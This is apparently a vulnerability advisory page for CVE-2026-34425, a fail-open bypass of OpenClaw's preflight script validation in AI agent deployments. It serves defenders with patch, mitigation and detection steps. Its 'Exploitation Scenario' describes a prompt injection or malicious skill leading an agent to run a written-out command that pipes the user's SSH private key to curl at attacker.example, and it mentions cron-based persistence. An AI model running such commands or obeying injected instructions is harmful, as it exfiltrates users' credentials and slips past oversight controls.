OpenClaw (npm) versions ≤ 2026.4.1 contain a validation bypass where complex shell constructs — pipes, compound commands — cause preflight script-content validation to fail open, skipping the safety check entirely rather than blocking the execution. In AI agent deployments where OpenClaw orchestrates tool calls or executes scripts on behalf of LLM-generated instructions, this undermines the sole defense-in-depth control designed to block unsafe script content before it runs. While raw EPSS probability is low (0.00048), the CVE sits at the 85th percentile of exploitation likelihood across all CVEs, and the OpenClaw ecosystem has documented active third-party skill abuse (AIID #1368, Feb. 2026), raising the real-world risk above what severity ratings alone suggest. Upgrade to ≥ 2026.4.2 immediately; if patching is blocked, add an upstream wrapper that rejects non-simple command forms and restrict OpenClaw's runtime to least-privilege execution contexts.
What is the risk?
Medium risk overall, elevated in agentic contexts. The vulnerability is a defense-in-depth bypass, not a direct unauthenticated RCE — exploitation requires the ability to influence the shape of commands passed to OpenClaw's exec. In AI agent pipelines, that precondition is routinely met: LLM-generated commands, user-supplied parameters, and third-party skill inputs all flow into tool execution interfaces. No public exploit or KEV listing reduces urgency, but the absence of a CVSS vector and the fail-open nature of the bypass means operators may underestimate exposure. Environments that treat OpenClaw's preflight check as a security boundary rather than a best-effort guard are most at risk.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| OpenClaw | npm | <= 2026.4.1 | 2026.4.2 |
Do you use OpenClaw? You're affected.
How severe is it?
What should I do?
5 steps-
Patch: upgrade openclaw to ≥ 2026.4.2 (fix commit 8aceaf5d). The patched version closes the fail-open path in exec script preflight.
-
If immediate patching is blocked: audit all exec call sites for complex command forms (pipes
|, subshells$(),&&,;chaining) and add an upstream allowlist that rejects non-simple command shapes before they reach OpenClaw. -
Apply least-privilege runtime constraints to any process running OpenClaw — no outbound network from script execution contexts, restricted filesystem access, no credential store access.
-
For skill-based deployments, cross-reference installed skills against the OpenClaw skills registry and remove unverified third-party skills pending audit.
-
Detection: monitor for anomalous process spawning from OpenClaw parent processes, particularly commands containing pipe characters or network egress from script execution children.
What does CISA's SSVC say?
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2026-34425?
OpenClaw (npm) versions ≤ 2026.4.1 contain a validation bypass where complex shell constructs — pipes, compound commands — cause preflight script-content validation to fail open, skipping the safety check entirely rather than blocking the execution. In AI agent deployments where OpenClaw orchestrates tool calls or executes scripts on behalf of LLM-generated instructions, this undermines the sole defense-in-depth control designed to block unsafe script content before it runs. While raw EPSS probability is low (0.00048), the CVE sits at the 85th percentile of exploitation likelihood across all CVEs, and the OpenClaw ecosystem has documented active third-party skill abuse (AIID #1368, Feb. 2026), raising the real-world risk above what severity ratings alone suggest. Upgrade to ≥ 2026.4.2 immediately; if patching is blocked, add an upstream wrapper that rejects non-simple command forms and restrict OpenClaw's runtime to least-privilege execution contexts.
Is CVE-2026-34425 actively exploited?
No confirmed active exploitation of CVE-2026-34425 has been reported, but organizations should still patch proactively.
How to fix CVE-2026-34425?
1. Patch: upgrade openclaw to ≥ 2026.4.2 (fix commit 8aceaf5d). The patched version closes the fail-open path in exec script preflight. 2. If immediate patching is blocked: audit all exec call sites for complex command forms (pipes `|`, subshells `$()`, `&&`, `;` chaining) and add an upstream allowlist that rejects non-simple command shapes before they reach OpenClaw. 3. Apply least-privilege runtime constraints to any process running OpenClaw — no outbound network from script execution contexts, restricted filesystem access, no credential store access. 4. For skill-based deployments, cross-reference installed skills against the OpenClaw skills registry and remove unverified third-party skills pending audit. 5. Detection: monitor for anomalous process spawning from OpenClaw parent processes, particularly commands containing pipe characters or network egress from script execution children.
What systems are affected by CVE-2026-34425?
This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI agent tool invocations, code execution environments, automation pipelines.
What is the CVSS score for CVE-2026-34425?
No CVSS score has been assigned yet.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0010.005 AI Agent Tool AML.T0050 Command and Scripting Interpreter AML.T0053 AI Agent Tool Invocation AML.T0107 Exploitation for Defense Evasion Compliance Controls Affected
What are the technical details?
Original Advisory
## Summary Before OpenClaw 2026.4.2, exec script preflight validation could fail open on complex interpreter invocations such as pipes or other non-simple command forms. In those cases, script-content validation could be skipped entirely. ## Impact An attacker-controlled command shape could bypass the intended preflight validation for script execution. This weakened a defense-in-depth guard that was meant to block unsafe script content before execution. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.1` - Patched versions: `>= 2026.4.2` - Latest published npm version: `2026.4.1` ## Fix Commit(s) - `8aceaf5d0f0ec552b75a792f7f0a3bfa5b091513` — close the fail-open bypass in exec script preflight ## Release Process Note The fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live. Thanks @iskindar for reporting, and thanks @wsparks-vc for coordination.
Exploitation Scenario
An adversary targets an AI coding assistant or agentic automation platform built on OpenClaw. They either submit a malicious third-party skill or craft a prompt injection that causes the agent to invoke exec with a piped command — e.g., `cat ~/.ssh/id_rsa | curl -X POST https://attacker.example/collect -d @-`. Because the preflight validator only handles simple command forms, the pipe construct causes validation to fail open and the check is skipped entirely. The unsafe command executes with the agent's runtime privileges, exfiltrating SSH keys or environment variables containing API tokens. In a more targeted variant, the adversary leverages this to establish persistence by writing a cron entry or backdoor via the same exec bypass, staying below detection thresholds since no exploit tooling is currently public.
Weaknesses (CWE)
CWE-184 — Incomplete List of Disallowed Inputs: The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are not allowed by policy or otherwise require other action to neutralize before additional processing takes place, but the list is incomplete.
- [Implementation] Do not rely exclusively on detecting disallowed inputs. There are too many variants to encode a character, especially when different environments are used, so there is a high likelihood of missing some variants. Only use detection of disallowed inputs as a mechanism for detecting suspicious activity. Ensure that you are using other protection mechanisms that only identify "good" input - such as lists of allowed inputs - and ensure that you are properly encoding your outputs.
Source: MITRE CWE corpus.
References
- github.com/advisories/GHSA-fvx6-pj3r-5q4q
- github.com/openclaw/openclaw/commit/8aceaf5d0f0ec552b75a792f7f0a3bfa5b091513
- github.com/openclaw/openclaw/security/advisories/GHSA-fvx6-pj3r-5q4q
- nvd.nist.gov/vuln/detail/CVE-2026-34425
- vulncheck.com/advisories/openclaw-shell-bleed-protection-preflight-validation-bypass
Timeline
Related Vulnerabilities
CVE-2026-33579 9.9 OpenClaw: scope bypass escalates low-priv to admin
Same package: openclaw CVE-2026-32922 9.9 OpenClaw: privilege escalation to RCE via token scope bypass
Same package: openclaw CVE-2026-30741 9.8 OpenClaw: RCE via request-side prompt injection
Same package: openclaw CVE-2026-32038 9.8 OpenClaw: sandbox bypass enables container lateral movement
Same package: openclaw CVE-2026-53838 9.8 OpenClaw: approval scope bypass via reconnection state
Same package: openclaw